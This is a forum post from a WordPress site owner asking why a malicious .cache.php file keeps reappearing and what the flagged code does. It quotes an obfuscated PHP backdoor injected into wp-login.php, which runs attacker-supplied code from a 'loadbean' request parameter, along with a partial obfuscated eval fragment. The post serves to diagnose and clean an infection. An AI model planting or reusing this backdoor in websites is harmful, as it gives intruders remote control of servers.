Hac Le on "Malicious php file generates itself after deleted"

Hi every one,
It's the first time that I post here so I hope it goes to the right forum.
I used Wordfence to scan my site and got some malicious codes :
-There was a malicious file named .cache.php located at wp-content/themes. Here is the malicious code suggested by wordfence str_rot13(pack("H*","71626265"))])){error_reporting(0);$O101O=strrev("edoced_4"."6esab");eval(.
It was a hidden file. Eveytime I deleted it as suggested by Wordfence, a couple of hours later, I scanned the site again and voila, there it was again, with the exact same location, same name, same code.
- Along side with it was the wp-login.php file got modified
<?php if(isset($_GET["\154o\141\144b\x65\141\x6e"])||isset($_GET["\x79"])){$b="\142\141se664\137\x64\x65\143\157d\x65";$_copyright="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_theme=$_copyright("",$b("c2Vzc2lvbl9zdGFydCgpOyRwXzE9aXNzZXQoJF9HRVRbJ2xvYWRiZWFuJ10pPyRfR0VUWydsb2FkYmVhbiddOiRfU0VTU0lPTlsndGhlX2NvZGUnXTtldmFsKGJhc2U2NF9kZWNvZGUoJHBfMSkpO2V2YWwoJHBfMik7"));$_theme();}?><?php
So I restored the file to the original version as suggested by Wordfence. Again, later, I found that code again with the suspicious cache.php file.

So are those code dangerous? Do I just ignore it or need to find its origin?
At first, I suspected those codes were from my theme from Padd Solution, so I deleted it. Now I am using Tempera downloaded directly from wordpress page. Still they just appeared again.
My plug-ins include :
BackWPup, Better WP Security, BulletProof Security, Custom Post Templates, Facebook, MailChimp for WordPress Lite, Theme Authenticity Checker (TAC), TinyMCE Advanced, Use Google Libraries, Visual LightBox (this is from my paid app so I think it's fine), Wordfence Security, WordPress Popular Posts, WordPress SEO by Yoast, WP Super Cache,Yet Another Related Posts Plugin

Besides that, I use SecureIP. I uploaded 2 php files to wp-admin so that just people with registered IP can access Wp-admin area.

So I don't know what those codes are about and how to find their source. Hope you can help me. Thanks!